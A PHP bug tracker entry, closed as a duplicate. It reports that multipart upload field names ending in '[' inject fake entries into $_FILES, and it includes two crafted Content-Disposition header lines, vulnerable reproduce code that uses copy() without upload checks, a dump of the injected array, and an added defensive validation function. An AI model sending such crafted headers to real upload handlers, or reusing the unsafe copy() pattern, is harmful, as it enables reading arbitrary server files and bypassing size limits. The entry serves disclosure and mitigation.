ID:          49683
 Updated by:  j...@php.net
 Reported By: adamiwaniuk at gmail dot com
-Status:      Open
+Status:      Bogus
 Bug Type:    Unknown/Other Function
 PHP Version: 5.2.11
 New Comment:

Same problem as already reported in bug #48597


Previous Comments:
------------------------------------------------------------------------

[2009-09-26 21:47:06] adamiwaniuk at gmail dot com

Description:
------------
When 'name' from Content-Disposition ends with '[' or '[xxxxx', it is
possible to prepare some fake data in the $_FILES structure array.
If someone uploads multiple files, it is possible to set a fake size for a
file, or, when someone is using an unsafe upload method (without
is_uploaded_file()/move_uploaded_file()), to set tmp_name to any file.

Example content:

Content-Disposition: form-data; name="images[[tmp_name]"; filename="file.txt"

Content-Disposition: form-data; name="images[tmp_name]["; filename="index.php"

Reproduce code:
---------------
<?php var_dump($_FILES)?>

<?php

foreach ($_FILES["images"]["tmp_name"] as $key => $name){
        copy($_FILES["images"]["tmp_name"][$key],'upload\\a'.rand().'.txt');
}
?>


<?php
foreach ($_FILES["images"]["tmp_name"] as $key => $name) {
        if ($_FILES["images"]["size"][$key]>0 && $_FILES["images"]["size"][$key]<1024)
                move_uploaded_file($_FILES["images"]["tmp_name"][$key],'upload\\'.rand().'.txt');
}

?>


Expected result:
----------------
It should skip the uploaded file when 'name' ends with '[' or '[xxx'.

Actual result:
--------------
array(1) {
  ["images"]=>
  array(5) {
    ["name"]=>
    array(1) {
      ["[tmp_name"]=>
      string(5) "file.txt"
    }
    ["type"]=>
    array(1) {
      ["[tmp_name"]=>
      string(10) "text/plain"
    }
    ["tmp_name"]=>
    array(5) {
      ["[tmp_name"]=>
      string(66) "C:\Documents and Settings\Adam\Ustawienia lokalne\Temp\php36E3.tmp"
      ["[name"]=>
      string(10) "index.php"
      ["[type"]=>
      string(10) "text/plain"
      ["[error"]=>
      int(0)
      ["[size"]=>
      int(11)
    }
    ["error"]=>
    array(1) {
      ["[tmp_name"]=>
      int(0)
    }
    ["size"]=>
    array(1) {
      ["[tmp_name"]=>
      int(3)
    }
  }
}


------------------------------------------------------------------------
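
A defensive check for the $_FILES shape shown in the report above, as an added example that is not part of the bug report or of PHP itself. The function name safe_upload_entries(), its parameters and the temp path are hypothetical, and it assumes PHP 7.1 or later.

```php
<?php
// Added example, not code from the bug report or from PHP itself.
// safe_upload_entries() and its parameters are hypothetical names.
function safe_upload_entries(array $field, int $maxBytes, ?callable $isUploaded = null): array
{
    $isUploaded = $isUploaded ?? 'is_uploaded_file';
    $parts = ['name', 'type', 'tmp_name', 'error', 'size'];
    foreach ($parts as $part) {
        if (!isset($field[$part]) || !is_array($field[$part])) {
            return []; // not a well-formed multi-file field
        }
    }
    $accepted = [];
    foreach ($field['tmp_name'] as $key => $tmp) {
        // Keys left over from names such as images[[tmp_name] contain a bracket.
        if (is_string($key) && strpbrk($key, '[]') !== false) {
            continue;
        }
        // The same key must exist in all five sub-arrays.
        foreach ($parts as $part) {
            if (!array_key_exists($key, $field[$part])) {
                continue 2;
            }
        }
        if ($field['error'][$key] !== UPLOAD_ERR_OK || !is_string($tmp) || !$isUploaded($tmp)) {
            continue;
        }
        // Measure the file on disk instead of trusting $_FILES[...]['size'].
        $bytes = filesize($tmp);
        if ($bytes === false || $bytes <= 0 || $bytes >= $maxBytes) {
            continue;
        }
        $accepted[$key] = ['tmp_name' => $tmp, 'size' => $bytes];
    }
    return $accepted;
}

// Constructed input shaped like the "Actual result" dump (temp path is a placeholder).
$field = [
    'name'     => ['[tmp_name' => 'file.txt'],
    'type'     => ['[tmp_name' => 'text/plain'],
    'tmp_name' => ['[tmp_name' => '/tmp/phpXXXX.tmp', '[name' => 'index.php',
                   '[type' => 'text/plain', '[error' => 0, '[size' => 11],
    'error'    => ['[tmp_name' => 0],
    'size'     => ['[tmp_name' => 3],
];
var_dump(safe_upload_entries($field, 1024));
```

With the constructed input every key carries a stray bracket, so no entry is accepted; entries that do pass should still be stored with move_uploaded_file() under a server-chosen name.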


-- 
Edit this bug report at http://bugs.php.net/?id=49683&edit=1